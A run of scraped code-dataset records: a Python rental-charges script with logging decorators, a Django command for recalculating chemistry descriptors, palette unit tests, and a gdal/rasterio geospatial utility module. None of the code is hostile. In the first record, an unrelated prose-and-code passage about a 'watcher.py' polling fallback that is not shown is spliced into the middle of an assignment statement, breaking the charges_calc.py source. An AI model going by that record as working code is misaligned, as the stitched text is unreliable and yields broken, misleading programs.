messages\"\"\"\n logger.setLevel(logging.ERROR)\n console_handler.setLevel(logging.ERROR)\n file_handler.setLevel(logging.ERROR)\n elif debug_level == 2:\n # \"\"\"WARNING messages print to console and file;\n # Tis prints Warning and above messages\"\"\"\n logger.setLevel(logging.WARNING)\n console_handler.setLevel(logging.WARNING)\n file_handler.setLevel(logging.WARNING)\n elif debug_level == 3:\n # \"\"\"DEBUG messages print to console and warning messages to file;\n # This prints debug and above messages\"\"\"\n logger.setLevel(logging.DEBUG)\n console_handler.setLevel(logging.DEBUG)\n file_handler.setLevel(logging.WARNING)\n return func(*args, **kwargs)\n return log_debug\n\n\n# def log_debug(debug):\n# \"\"\"Function to enable the required debugging level\"\"\"\n# log_format = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\n# log_file = datetime.datetime.now().strftime('%Y-%m-%d') + '_charges_calc.log'\n# formatter 
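watcher.py above depends on Linux dnotify (fcntl.F_NOTIFY plus SIGIO), which is not portable. A coarser but portable fallback is polling the watched path's mtime; note that a directory's mtime only changes when entries are added, removed or renamed:

import os
import time

def watch(path, command, interval=1.0):
    last = os.stat(path).st_mtime
    while True:
        time.sleep(interval)
        current = os.stat(path).st_mtime
        if current != last:
            last = current
            os.system(command)   # mirrors the original handler's os.system call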
= logging.Formatter(log_format)\n#\n# file_handler = logging.FileHandler(log_file)\n# file_handler.setFormatter(formatter)\n#\n# console_handler = logging.StreamHandler()\n# console_handler.setLevel(logging.DEBUG)\n# console_handler.setFormatter(formatter)\n#\n# logger = logging.getLogger()\n# logger.addHandler(file_handler)\n# logger.addHandler(console_handler)\n#\n# debug_level = debug\n# if debug_level == 0:\n# #This will disable all the logging\n# logger.disabled = True\n# file_handler.disabled = True\n# elif debug_level == 1:\n# #\"\"\"Error messages; This prints error and above messages\"\"\"\n# logger.setLevel(logging.ERROR)\n# console_handler.setLevel(logging.ERROR)\n# file_handler.setLevel(logging.ERROR)\n# elif debug_level == 2:\n# #\"\"\"WARNING messages print to console and file; Tis prints Warning and above messages\"\"\"\n# logger.setLevel(logging.WARNING)\n# console_handler.setLevel(logging.WARNING)\n# file_handler.setLevel(logging.WARNING)\n# elif debug_level == 3:\n# #\"\"\"DEBUG messages print to console and warning messages to file;\n# #This prints debug and above messages\"\"\"\n# logger.setLevel(logging.DEBUG)\n# console_handler.setLevel(logging.DEBUG)\n# file_handler.setLevel(logging.WARNING)\n\n\ndef parse_cmd_arguments():\n \"\"\"Required and optional arguments by the user\"\"\"\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', help='input JSON file', required=True)\n parser.add_argument('-o', '--output', help='ouput JSON file', required=True)\n parser.add_argument('-d', '--debug', help='debug messages', type=int, default=0)\n\n return parser.parse_args()\n\n\n@logged_func\ndef load_rentals_file(filename):\n \"\"\"Function to load the json file\"\"\"\n with open(filename) as file:\n try:\n logging.debug(\"loading the json data file\")\n data = json.load(file)\n #logging.debug(\"complete json data {}\".format(data))\n except FileNotFoundError:\n logging.error(\"File not found\")\n exit(0)\n return data\n\n\n@logged_func\ndef calculate_additional_fields(data):\n \"\"\"Function to calculate the required fields\"\"\"\n for value in data.values():\n logging.debug(\"calculate_additional_fields function is called from main\")\n logging.debug(f\"First value of the data {value}\")\n try:\n rental_start = datetime.datetime.strptime(value['rental_start'], '%m/%d/%y')\n logging.debug(\"Getting the rental start time\")\n logging.debug(f\"Rental start period is {rental_start}\")\n rental_end = datetime.datetime.strptime(value['rental_end'], '%m/%d/%y')\n logging.debug(\"Getting the rental end time\")\n logging.debug(f\"Rental end period is {rental_end}\")\n except ValueError:\n logging.debug(\"Incorrect rental start and end date formats\")\n value['total_days'] = (rental_end - rental_start).days\n if value['total_days'] < 0:\n logging.debug(f\"total period of rental is {value['total_days']}\")\n logging.warning(f\"Rental start and end periods \"\n f\"are incorrect for {value['product_code']}\")\n try:\n value['total_price'] = value['total_days'] * value['price_per_day']\n value['sqrt_total_price'] = math.sqrt(value['total_price'])\n except ValueError:\n logging.warning(f\"Cannot do square root for a \"\n f\"negative number{value['total_price']}\")\n logging.debug(f\"Cannot do square root for a negative number{value['total_price']}\")\n try:\n value['unit_cost'] = value['total_price'] / value['units_rented']\n except ZeroDivisionError:\n logging.debug(\"Units rented cannot be zero\")\n\n return data\n\n\ndef 
save_to_json(filename, data):\n \"\"\"Function to save the data after calculating the required fields\"\"\"\n with open(filename, 'w') as file:\n json.dump(data, file)\n #logging.debug(\"complete json data {}\".format(data))\n\n\nif __name__ == \"__main__\":\n ARGS = parse_cmd_arguments()\n # log_debug(ARGS.debug)\n # logging.debug(ARGS)\n DATA = load_rentals_file(ARGS.debug, ARGS.input)\n NEW_DATA = calculate_additional_fields(ARGS.debug, DATA)\n save_to_json(ARGS.output, NEW_DATA)\n","sub_path":"students/g_rama/lesson09/charges_calc.py","file_name":"charges_calc.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"308750010","text":"\"\"\"Recalculate the descriptors for all compounds and reactions.\"\"\"\nfrom django.core.management.base import BaseCommand\nfrom DRP.models import Reaction, Compound\nfrom django import db\nimport warnings\n\n\nclass Command(BaseCommand):\n\n \"\"\"Recalculate the descriptors for all compounds and reactions.\"\"\"\n\n help = 'Recalculate the descriptors for all compounds and reactions.'\n\n def add_arguments(self, parser):\n \"\"\"Add arguments for the parser.\"\"\"\n parser.fromfile_prefix_chars = '@'\n parser.epilog = \"Prefix arguments with '@' to specify a file containing newline-separated values for that argument. e.g.'-w @whitelist_headers.txt' to pass multiple descriptors from a file as whitelist.\"\n\n parser.add_argument('start', type=int, default=0, nargs='?',\n help='pk of starting point. Indicates compound pk unless --reactions is specified')\n parser.add_argument('-e', '--error-level', nargs='?', default=0, const=3, type=int,\n help='Make warnings errors instead. '\n '0 leaves python default settings '\n '(or whatever settings are specified by the command line flags when calling python). '\n '1 makes only RuntimeWarnings errors. '\n '2 makes Runtime and User Warnings errors. 
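The logged_func decorator in charges_calc.py above silently prepends a debug argument to every wrapped function, which is why main must call load_rentals_file(ARGS.debug, ARGS.input). A decorator factory configures logging without changing the wrapped signatures; a sketch:

import functools
import logging

def logged(level):
    """Configure logging once; wrapped functions keep their own signatures."""
    logging.basicConfig(level=level)
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            logging.getLogger(func.__module__).debug("calling %s", func.__name__)
            return func(*args, **kwargs)
        return wrapper
    return decorator

@logged(logging.DEBUG)
def load_rentals_file(filename):
    logging.debug("loading %s", filename)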
'\n '3 makes all warnings errors.')\n parser.add_argument('-p', '--plugins', nargs='+',\n help='Plugins to use (default all).')\n parser.add_argument('-w', '--whitelist', nargs='+',\n help='One or more descriptor headers to calculate from specified plugins (default all for given plugins).')\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument('-r', '--reactions', '--rxns', action='store_true',\n help='Calculate descriptors for reactions only.')\n group.add_argument('-c', '--compounds', action='store_true',\n help='Calculate descriptors for compounds only.')\n group.add_argument('--include-invalid', action='store_true',\n help='Calculate descriptors for invalid reactions also.')\n group.add_argument('--include-non-performed', action='store_true',\n help='Calculate descriptors for non-performed reactions also.')\n\n def handle(self, *args, **kwargs):\n \"\"\"Handle the function call.\"\"\"\n verbose = (kwargs['verbosity'] > 0)\n only_reactions = kwargs['reactions']\n only_compounds = kwargs['compounds']\n start = kwargs['start']\n whitelist = kwargs['whitelist']\n plugins = kwargs['plugins']\n include_invalid = kwargs['include_invalid']\n include_non_performed = kwargs['include_non_performed']\n\n if whitelist is not None:\n # just a little optimization\n whitelist = set(whitelist)\n\n if kwargs['error_level'] == 1:\n warnings.simplefilter('error', RuntimeWarning)\n if kwargs['error_level'] == 2:\n warnings.simplefilter('error', UserWarning)\n warnings.simplefilter('error', RuntimeWarning)\n if kwargs['error_level'] == 3:\n warnings.simplefilter('error')\n\n if not only_reactions:\n Compound.objects.order_by('pk').filter(pk__gte=start).calculate_descriptors(\n verbose=verbose, whitelist=whitelist, plugins=plugins)\n if not only_compounds:\n reactions = Reaction.objects.order_by('pk')\n if only_reactions:\n reactions = reactions.filter(pk__gte=start)\n if not include_invalid:\n reactions = reactions.exclude(performedreaction__valid=False)\n if not include_non_performed:\n reactions = reactions.exclude(performedreaction=None)\n reactions.calculate_descriptors(\n verbose=verbose, whitelist=whitelist, plugins=plugins)\n","sub_path":"DRP/management/commands/calculate_descriptors.py","file_name":"calculate_descriptors.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"445937752","text":"#\n# This file is part of BEAVr, https://github.com/theoryinpractice/beavr/, and is\n# Copyright (C) North Carolina State University, 2016. 
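In calculate_descriptors.py above, --include-invalid and --include-non-performed sit in the same mutually exclusive group as -r/-c, so they can never be combined with --reactions. If that is unintended, moving them out of the group restores the combination; a sketch:

import argparse

parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument("-r", "--reactions", action="store_true")
group.add_argument("-c", "--compounds", action="store_true")
parser.add_argument("--include-invalid", action="store_true")
parser.add_argument("--include-non-performed", action="store_true")
args = parser.parse_args(["-r", "--include-invalid"])   # legal once ungrouped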
It is licensed under\n# the three-clause BSD license; see LICENSE.\n#\n\nimport unittest\nfrom beavr import util\n\nclass TestUtil(unittest.TestCase):\n\n def setUp(self):\n \"\"\" Sets up the necessary data structures and variables before tests are run \"\"\"\n\n def tearDown(self):\n \"\"\" Cleans up after tests are run \"\"\"\n\n def test_load_palette(self):\n \"\"\" Tests load_palette \"\"\"\n expected_first = [0.89411764,0.10196078,0.10980392]\n expected_last = [0.8,0.8,0.8]\n expected_length = 74\n\n color_palette = util.load_palette(\"brewer\")\n \n actual_length = len(color_palette)\n actual_first = color_palette[0]\n actual_last = color_palette[-1]\n\n self.assertEqual(expected_length, actual_length,\n msg=\"Number of colors in palette\")\n\n self.assertEqual(3, len(color_palette[0]), \n msg=\"Ensuring colors have 3 values for RGB format\")\n\n for exp, act in zip(expected_first, actual_first):\n diff = abs(exp - act)\n self.assertTrue(diff < 0.0001, msg=\"First color in palette\" +\\\n \"\\n Expected: \" + str(expected_first) + \\\n \"\\n Actual: \" + str(actual_first))\n\n for exp, act in zip(expected_last, actual_last):\n diff = abs(exp - act)\n self.assertTrue(diff < 0.0001, msg=\"First color in palette\" +\\\n \"\\n Expected: \" + str(expected_last) + \\\n \"\\n Actual: \" + str(actual_last))\n\n def test_map_colorings(self):\n \"\"\" Tests map_colorings\"\"\"\n colorings = [[7, 3, 6, 2, 0], [1, 3, 7, 5]]\n color_palette = [(a,b,c) for a in [0,1] for b in [0,1] for c in [0,1]]\n expected_mapped = [[(1,1,1), (0,1,1), (1,1,0), (0,1,0), (0,0,0)],\n [(0,0,1), (0,1,1), (1,1,1), (1,0,1)]]\n \n actual_mapped = util.map_colorings(color_palette, colorings)\n\n for exp_map_col, act_map_col in zip(expected_mapped, actual_mapped):\n for exp, act in zip(exp_map_col, act_map_col):\n self.assertEqual(exp, act, msg=\"Mapped colorings\" +\\\n \"\\n Expected: \" + str(exp_map_col) +\\\n \"\\n Actual: \" + str(act_map_col))\n\n def test_map_coloring(self):\n \"\"\" Tests map_coloring\"\"\"\n coloring = [7, 3, 6, 2, 0]\n color_palette = [(a,b,c) for a in [0,1] for b in [0,1] for c in [0,1]]\n expected_mapped = [(1,1,1), (0,1,1), (1,1,0), (0,1,0), (0,0,0)]\n \n actual_mapped = util.map_coloring(color_palette, coloring)\n\n for exp, act in zip(expected_mapped, actual_mapped):\n self.assertEqual(exp, act, msg=\"Mapped coloring\" +\\\n \"\\n Expected: \" + str(expected_mapped) +\\\n \"\\n Actual: \" + str(actual_mapped))\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestUtil)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unittests/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42511464","text":"# vim: set fileencoding=utf-8\n# pylint: disable=C0103\n\n\"\"\"\nWrappers for gdal and rasterio.\n\nCopyright (C) 2018, Carlo de Franchis \n\"\"\"\n\nfrom __future__ import print_function\nimport os\nimport re\nimport errno\nimport shutil\nimport argparse\nimport datetime\nimport subprocess\nimport tempfile\nimport tifffile\nfrom osgeo import gdal, osr\nimport numpy as np\nimport utm\nimport traceback\nimport warnings\nimport sys\nimport geojson\nimport requests\nimport shapely.geometry\nimport rasterio\ngdal.UseExceptions()\n\nimport rpc_model\n\n\nwarnings.filterwarnings(\"ignore\",\n category=rasterio.errors.NotGeoreferencedWarning)\n\n\ndef download(from_url, to_file, auth=('', '')):\n \"\"\"\n Download a file from an url to a file.\n \"\"\"\n 
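The beavr tests above hand-roll abs(exp - act) < 0.0001 loops; unittest.TestCase.assertAlmostEqual expresses the same tolerance and reports both values on failure. A sketch with illustrative values:

import unittest

class TestPalette(unittest.TestCase):
    def test_first_color(self):
        expected = [0.89411764, 0.10196078, 0.10980392]
        actual = [0.8941, 0.1020, 0.1098]               # illustrative values
        for exp, act in zip(expected, actual):
            self.assertAlmostEqual(exp, act, places=3)  # difference rounds to 0 at 3 places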
mkdir_p(os.path.dirname(to_file))\n response = requests.get(from_url, stream=True, auth=auth)\n with open(to_file, 'wb') as handle:\n for data in response.iter_content():\n handle.write(data)\n\n\ndef valid_datetime(s):\n \"\"\"\n Check if a string is a well-formatted datetime.\n \"\"\"\n try:\n return datetime.datetime.strptime(s, \"%Y-%m-%d\")\n except ValueError:\n raise argparse.ArgumentTypeError(\"Invalid date: '{}'\".format(s))\n\n\ndef valid_date(s):\n \"\"\"\n Check if a string is a well-formatted date.\n \"\"\"\n try:\n return datetime.datetime.strptime(s, \"%Y-%m-%d\").date()\n except ValueError:\n raise argparse.ArgumentTypeError(\"Invalid date: '{}'\".format(s))\n\n\ndef valid_lon(s):\n \"\"\"\n Check if a string is a well-formatted longitude.\n \"\"\"\n try:\n return float(s)\n except ValueError:\n regex = r\"(\\d+)d(\\d+)'([\\d.]+)\\\"([WE])\"\n m = re.match(regex, s)\n if m is None:\n raise argparse.ArgumentTypeError(\"Invalid longitude: '{}'\".format(s))\n else:\n x = m.groups()\n lon = int(x[0]) + float(x[1]) / 60 + float(x[2]) / 3600\n if x[3] == 'W':\n lon *= -1\n return lon\n\n\ndef valid_lat(s):\n \"\"\"\n Check if a string is a well-formatted latitude.\n \"\"\"\n try:\n return float(s)\n except ValueError:\n regex = r\"(\\d+)d(\\d+)'([\\d.]+)\\\"([NS])\"\n m = re.match(regex, s)\n if m is None:\n raise argparse.ArgumentTypeError(\"Invalid latitude: '{}'\".format(s))\n else:\n x = m.groups()\n lat = int(x[0]) + float(x[1]) / 60 + float(x[2]) / 3600\n if x[3] == 'S':\n lat *= -1\n return lat\n\n\ndef valid_geojson(filepath):\n \"\"\"\n Check if a file contains valid geojson.\n \"\"\"\n with open(filepath, 'r') as f:\n geo = geojson.load(f)\n if type(geo) == geojson.geometry.Polygon:\n return geo\n if type(geo) == geojson.feature.FeatureCollection:\n p = geo['features'][0]['geometry']\n if type(p) == geojson.geometry.Polygon:\n return p\n raise argparse.ArgumentTypeError('Invalid geojson: only polygons are supported')\n\n\ndef geojson_geometry_object(lat, lon, w, h):\n \"\"\"\n \"\"\"\n return geojson.Polygon([lonlat_rectangle_centered_at(lon, lat, w, h)])\n\n\ndef is_valid(f):\n \"\"\"\n Check if a path is a valid image file according to gdal.\n \"\"\"\n try:\n a = gdal.Open(f); a = None # gdal way of closing files\n return True\n except RuntimeError:\n return False\n\n\ndef tmpfile(ext=''):\n \"\"\"\n Creates a temporary file.\n\n Args:\n ext: desired file extension. 
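For instance '.tif'. 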
The dot has to be included.\n\n    Returns:\n        absolute path to the created file\n    \"\"\"\n    fd, out = tempfile.mkstemp(suffix=ext)\n    os.close(fd)  # http://www.logilab.org/blogentry/17873\n    return out\n\n\ndef mkdir_p(path):\n    \"\"\"\n    Create a directory without complaining if it already exists.\n    \"\"\"\n    if path:\n        try:\n            os.makedirs(path)\n        except OSError as exc:  # requires Python > 2.5\n            if exc.errno == errno.EEXIST and os.path.isdir(path):\n                pass\n            else:\n                raise\n\n\ndef pixel_size(filename):\n    \"\"\"\n    Read the resolution (in meters per pixel) of a geotif image.\n    \"\"\"\n    f = gdal.Open(filename)\n    if f is None:\n        print('WARNING: Unable to open {} for reading'.format(filename))\n        return\n    try:\n        # GetGeoTransform gives a 6-tuple containing tx, rx, 0, ty, 0, ry\n        resolution = np.array(f.GetGeoTransform())[[1, 5]]\n    except AttributeError:\n        print('WARNING: Unable to retrieve {} GeoTransform'.format(filename))\n        return\n    f = None  # gdal way of closing files\n    return resolution[0], -resolution[1]  # for gdal, ry < 0\n\n\ndef set_geotif_metadata(filename, geotransform=None, projection=None,\n                        metadata=None):\n    \"\"\"\n    Write some metadata (using GDAL) to the header of a geotif file.\n\n    Args:\n        filename: path to the file where the information has to be written\n        geotransform, projection: gdal geographic information\n        metadata: dictionary written to the GDAL 'Metadata' tag. It can be used\n            to store any extra metadata (e.g. acquisition date, sun azimuth...)\n    \"\"\"\n    f = gdal.Open(filename, gdal.GA_Update)\n    if f is None:\n        print('Unable to open {} for writing'.format(filename))\n        return\n\n    if geotransform is not None and geotransform != (0, 1, 0, 0, 0, 1):\n        f.SetGeoTransform(geotransform)\n\n    if projection is not None and projection != '':\n        f.SetProjection(projection)\n\n    if metadata is not None:\n        f.SetMetadata(metadata)\n\n\ndef set_geotif_metadata_item(filename, tagname, tagvalue):\n    \"\"\"\n    Append a key, value pair to the GDAL metadata tag of a geotif file.\n    \"\"\"\n    dataset = gdal.Open(filename, gdal.GA_Update)\n    if dataset is None:\n        print('Unable to open {} for writing'.format(filename))\n        return\n\n    dataset.SetMetadataItem(tagname, tagvalue)\n\n\ndef merge_bands(infiles, outfile):\n    \"\"\"\n    Produce a multi-band tiff file from a sequence of mono-band tiff files.\n\n    Args:\n        infiles: list of paths to the input mono-band images\n        outfile: path to the output multi-band image file\n    \"\"\"\n    # np.dstack expects a sequence of arrays, not a generator\n    tifffile.imsave(outfile, np.dstack([tifffile.imread(f) for f in infiles]))\n\n\ndef inplace_utm_reprojection_with_gdalwarp(src, utm_zone, ulx, uly, lrx, lry):\n    \"\"\"\n    Reproject a georeferenced image in place to the given UTM zone with gdalwarp.\n\n    Nothing is done if the image is already in the requested UTM zone.\n    \"\"\"\n    img = gdal.Open(src)\n    s = img.GetProjection()  # read geographic metadata\n    img = None  # gdal way of closing files\n    x = s.lower().split('utm zone ')[1][:2]  # hack to extract the UTM zone number\n    if int(x) != utm_zone:\n\n        # hack to allow the output to overwrite the input\n        fd, dst = tempfile.mkstemp(suffix='.tif', dir=os.path.dirname(src))\n        os.close(fd)\n\n        cmd = ['gdalwarp', '-t_srs', '+proj=utm +zone={}'.format(utm_zone),\n               '-te', str(ulx), str(lry), str(lrx), str(uly),  # xmin ymin xmax ymax\n               '-overwrite', src, dst]\n        print(' '.join(cmd))\n        try:\n            #print(' '.join(cmd))\n            subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n            shutil.move(dst, src)\n        except subprocess.CalledProcessError as e:\n            print('ERROR: this command failed')\n            print(' '.join(cmd))\n            print(e.output)\n\n\ndef crop_georeferenced_image(out_path, in_path, lon, lat, w, h):\n    \"\"\"\n    Crop an image around a given geographic location.\n\n    Args:\n        out_path: 
path to the output (cropped) image file\n in_path: path to the input image file\n lon, lat: longitude and latitude of the center of the crop\n w, h: width and height of the crop, in meters\n \"\"\"\n # compute utm geographic coordinates of the crop\n cx, cy = utm.from_latlon(lat, lon)[:2]\n ulx = cx - w / 2\n lrx = cx + w / 2\n uly = cy + h / 2 # in UTM the y coordinate increases from south to north\n lry = cy - h / 2\n\n if out_path == in_path: # hack to allow the output to overwrite the input\n fd, tmp = tempfile.mkstemp(suffix='.tif', dir=os.path.dirname(in_path))\n os.close(fd)\n subprocess.check_output(['gdal_translate', in_path, tmp, '-ot',\n 'UInt16', '-projwin', str(ulx), str(uly),\n str(lrx), str(lry)])\n shutil.move(tmp, out_path)\n else:\n subprocess.check_output(['gdal_translate', in_path, out_path, '-ot',\n 'UInt16', '-projwin', str(ulx), str(uly),\n str(lrx), str(lry)])\n\n\ndef gdal_translate_version():\n \"\"\"\n \"\"\"\n v = subprocess.check_output(['gdal_translate', '--version'])\n return v.decode().split()[1].split(',')[0]\n\n\ndef crop_with_gdal_translate(outpath, inpath, ulx, uly, lrx, lry,\n utm_zone=None, lat_band=None, output_type=None):\n \"\"\"\n \"\"\"\n if outpath == inpath: # hack to allow the output to overwrite the input\n fd, out = tempfile.mkstemp(suffix='.tif', dir=os.path.dirname(inpath))\n os.close(fd)\n else:\n out = outpath\n\n env = os.environ.copy()\n if inpath.startswith(('http://', 'https://')):\n env['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = inpath[-3:]\n env['GDAL_DISABLE_READDIR_ON_OPEN'] = 'TRUE'\n env['VSI_CACHE'] = 'TRUE'\n path = '/vsicurl/{}'.format(inpath)\n elif inpath.startswith('s3://'):\n env['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = inpath[-3:]\n env['GDAL_DISABLE_READDIR_ON_OPEN'] = 'TRUE'\n env['VSI_CACHE'] = 'TRUE'\n env['AWS_REQUEST_PAYER'] = 'requester'\n path = '/vsis3/{}'.format(inpath[len('s3://'):])\n else:\n path = inpath\n\n cmd = ['gdal_translate', path, out, '-of', 'GTiff', '-projwin', str(ulx),\n str(uly), str(lrx), str(lry)]\n if output_type is not None:\n cmd += ['-ot', output_type]\n if utm_zone is not None:\n if gdal_translate_version() < '2.0':\n print('WARNING: utils.crop_with_gdal_translate argument utm_zone requires gdal >= 2.0')\n else:\n srs = '+proj=utm +zone={}'.format(utm_zone)\n # latitude bands in the southern hemisphere range from 'C' to 'M'\n if lat_band and lat_band < 'N':\n srs += ' +south'\n cmd += ['-projwin_srs', srs]\n try:\n #print(' '.join(cmd))\n subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=env)\n except subprocess.CalledProcessError as e:\n if inpath.startswith(('http://', 'https://')):\n if not requests.head(inpath).ok:\n print('{} is not available'.format(inpath))\n return\n print('ERROR: this command failed')\n print(' '.join(cmd))\n print(e.output)\n return\n\n if outpath == inpath: # hack to allow the output to overwrite the input\n shutil.move(out, outpath)\n\n\ndef crop_with_gdalwarp(outpath, inpath, geojson_path):\n \"\"\"\n \"\"\"\n cmd = ['gdalwarp', inpath, outpath, '-ot', 'UInt16', '-of', 'GTiff',\n '-overwrite', '-crop_to_cutline', '-cutline', geojson_path]\n subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n\n\ndef get_image_utm_zone(img_path):\n \"\"\"\n Read the UTM zone from a geotif metadata.\n \"\"\"\n img = gdal.Open(img_path)\n s = img.GetProjection() # read geographic metadata\n img = None # gdal way of closing files\n return s.lower().split('utm zone ')[1][:2]\n\n\ndef geojson_lonlat_to_utm(aoi):\n \"\"\"\n \"\"\"\n # compute the utm zone number of the first 
polygon vertex\n lon, lat = aoi['coordinates'][0][0]\n utm_zone = utm.from_latlon(lat, lon)[2]\n\n # convert all polygon vertices coordinates from (lon, lat) to utm\n c = []\n for lon, lat in aoi['coordinates'][0]:\n c.append(utm.from_latlon(lat, lon, force_zone_number=utm_zone)[:2])\n\n return geojson.Polygon([c])\n\n\ndef utm_bbx(aoi, utm_zone=None, r=None):\n \"\"\"\n \"\"\"\n lon, lat = aoi['coordinates'][0][0]\n if utm_zone is None: # compute the utm zone number of the first vertex\n utm_zone, lat_band = utm.from_latlon(lat, lon)[2:]\n else:\n lat_band = utm.from_latlon(lat, lon, force_zone_number=utm_zone)[3]\n\n # convert all polygon vertices coordinates from (lon, lat) to utm\n c = []\n for lon, lat in aoi['coordinates'][0]:\n c.append(utm.from_latlon(lat, lon, force_zone_number=utm_zone)[:2])\n\n # utm bounding box\n bbx = shapely.geometry.Polygon(c).bounds # minx, miny, maxx, maxy\n ulx, uly, lrx, lry = bbx[0], bbx[3], bbx[2], bbx[1] # minx, maxy, maxx, miny\n\n if r is not None: # round to multiples of the given resolution\n ulx = r * np.round(ulx / r)\n uly = r * np.round(uly / r)\n lrx = r * np.round(lrx / r)\n lry = r * np.round(lry / r)\n\n return ulx, uly, lrx, lry, utm_zone, lat_band\n\n\ndef latlon_to_pix(img, lat, lon):\n \"\"\"\n Get the pixel coordinates of a geographic location in a georeferenced image.\n\n Args:\n img: path to the input image\n lat, lon: geographic coordinates of the input location\n\n Returns:\n x, y: pixel coordinates\n \"\"\"\n # load the image dataset\n ds = gdal.Open(img)\n\n # get a geo-transform of the dataset\n try:\n gt = ds.GetGeoTransform()\n except AttributeError:\n return 0, 0\n\n # create a spatial reference object for the dataset\n srs = osr.SpatialReference()\n srs.ImportFromWkt(ds.GetProjection())\n\n # set up the coordinate transformation object\n ct = osr.CoordinateTransformation(srs.CloneGeogCS(), srs)\n\n # change the point locations into the GeoTransform space\n point1, point0 = ct.TransformPoint(lon, lat)[:2]\n\n # translate the x and y coordinates into pixel values\n x = (point1 - gt[0]) / gt[1]\n y = (point0 - gt[3]) / gt[5]\n return int(x), int(y)\n\n\ndef latlon_rectangle_centered_at(lat, lon, w, h):\n \"\"\"\n \"\"\"\n x, y, number, letter = utm.from_latlon(lat, lon)\n rectangle = []\n rectangle.append(utm.to_latlon(x - .5*w, y - .5*h, number, letter))\n rectangle.append(utm.to_latlon(x - .5*w, y + .5*h, number, letter))\n rectangle.append(utm.to_latlon(x + .5*w, y + .5*h, number, letter))\n rectangle.append(utm.to_latlon(x + .5*w, y - .5*h, number, letter))\n rectangle.append(rectangle[0]) # close the polygon\n return rectangle\n\n\ndef lonlat_rectangle_centered_at(lon, lat, w, h):\n \"\"\"\n \"\"\"\n return [p[::-1] for p in latlon_rectangle_centered_at(lat, lon, w, h)]\n\n\ndef print_elapsed_time(since_first_call=False):\n \"\"\"\n Print the elapsed time since the last call or since the first call.\n\n Args:\n since_first_call:\n \"\"\"\n t2 = datetime.datetime.now()\n if since_first_call:\n print(\"Total elapsed time:\", t2 - print_elapsed_time.t0)\n else:\n try:\n print(\"Elapsed time:\", t2 - print_elapsed_time.t1)\n except AttributeError:\n print(\"Elapsed time:\", t2 - print_elapsed_time.t0)\n print_elapsed_time.t1 = t2\n print()\n\n\n#def show(img):\n# \"\"\"\n# \"\"\"\n# fig, ax = plt.subplots()\n# ax.imshow(img, interpolation='nearest')\n#\n# def format_coord(x, y):\n# col = int(x + 0.5)\n# row = int(y + 0.5)\n# if col >= 0 and col < img.shape[1] and row >= 0 and row < img.shape[0]:\n# z = img[row, col]\n# 
return 'x={}, y={}, z={}'.format(col, row, z)\n# else:\n# return 'x={}, y={}'.format(col, row)\n#\n# ax.format_coord = format_coord\n# plt.show()\n\n\ndef warn_with_traceback(message, category, filename, lineno, file=None,\n line=None):\n traceback.print_stack()\n log = file if hasattr(file,'write') else sys.stderr\n log.write(warnings.formatwarning(message, category, filename, lineno, line))\n\n#warnings.showwarning = warn_with_traceback\n\n\ndef bounding_box2D(pts):\n \"\"\"\n bounding box for the points pts\n \"\"\"\n dim = len(pts[0]) # should be 2\n bb_min = [min([t[i] for t in pts]) for i in range(dim)]\n bb_max = [max([t[i] for t in pts]) for i in range(dim)]\n return bb_min[0], bb_min[1], bb_max[0] - bb_min[0], bb_max[1] - bb_min[1]\n\n\ndef rpc_from_geotiff(geotiff_path):\n \"\"\"\n \"\"\"\n with rasterio.open(geotiff_path, 'r') as src:\n rpc_dict = src.tags(ns='RPC')\n return rpc_model.RPCModel(rpc_dict)\n\n\ndef points_apply_homography(H, pts):\n \"\"\"\n Applies an homography to a list of 2D points.\n\n Args:\n H: numpy array containing the 3x3 homography matrix\n pts: numpy array containing the list of 2D points, one per line\n\n Returns:\n a numpy array containing the list of transformed points, one per line\n \"\"\"\n pts = np.asarray(pts)\n\n # convert the input points to homogeneous coordinates\n if len(pts[0]) < 2:\n print(\"\"\"points_apply_homography: ERROR the input must be a numpy array\n of 2D points, one point per line\"\"\")\n return\n pts = np.hstack((pts[:, 0:2], pts[:, 0:1]*0+1))\n\n # apply the transformation\n Hpts = (np.dot(H, pts.T)).T\n\n # normalize the homogeneous result and trim the extra dimension\n Hpts = Hpts * (1.0 / np.tile( Hpts[:, 2], (3, 1)) ).T\n return Hpts[:, 0:2]\n\n\ndef bounding_box_of_projected_aoi(rpc, aoi, z=0, homography=None):\n \"\"\"\n Return the x, y, w, h pixel bounding box of a projected AOI.\n\n Args:\n rpc (rpc_model.RPCModel): RPC camera model\n aoi (geojson.Polygon): GeoJSON polygon representing the AOI\n z (float): altitude of the AOI with respect to the WGS84 ellipsoid\n homography (2D array, optional): matrix of shape (3, 3) representing an\n homography to be applied to the projected points before computing\n their bounding box.\n\n Return:\n x, y (ints): pixel coordinates of the top-left corner of the bounding box\n w, h (ints): pixel dimensions of the bounding box\n \"\"\"\n lons, lats = np.array(aoi['coordinates'][0]).T\n x, y = rpc.projection(lons, lats, z)\n pts = list(zip(x, y))\n if homography is not None:\n pts = points_apply_homography(homography, pts)\n return np.round(bounding_box2D(pts)).astype(int)\n\n\nclass CropOutside(Exception):\n \"\"\"\n Exception to raise when attempting to crop outside of the input image.\n \"\"\"\n pass\n\n\ndef rasterio_crop(filename, x, y, w, h, boundless=True, fill_value=0):\n \"\"\"\n Read a crop from a file with rasterio and return it as an array.\n\n This is a working alternative to this rasterio oneliner which currently fails:\n src.read(window=((y, y + h), (x, x + w)), boundless=True, fill_value=0)\n\n Args:\n filename: path to the input image file\n x, y: pixel coordinates of the top-left corner of the crop\n w, h: width and height of the 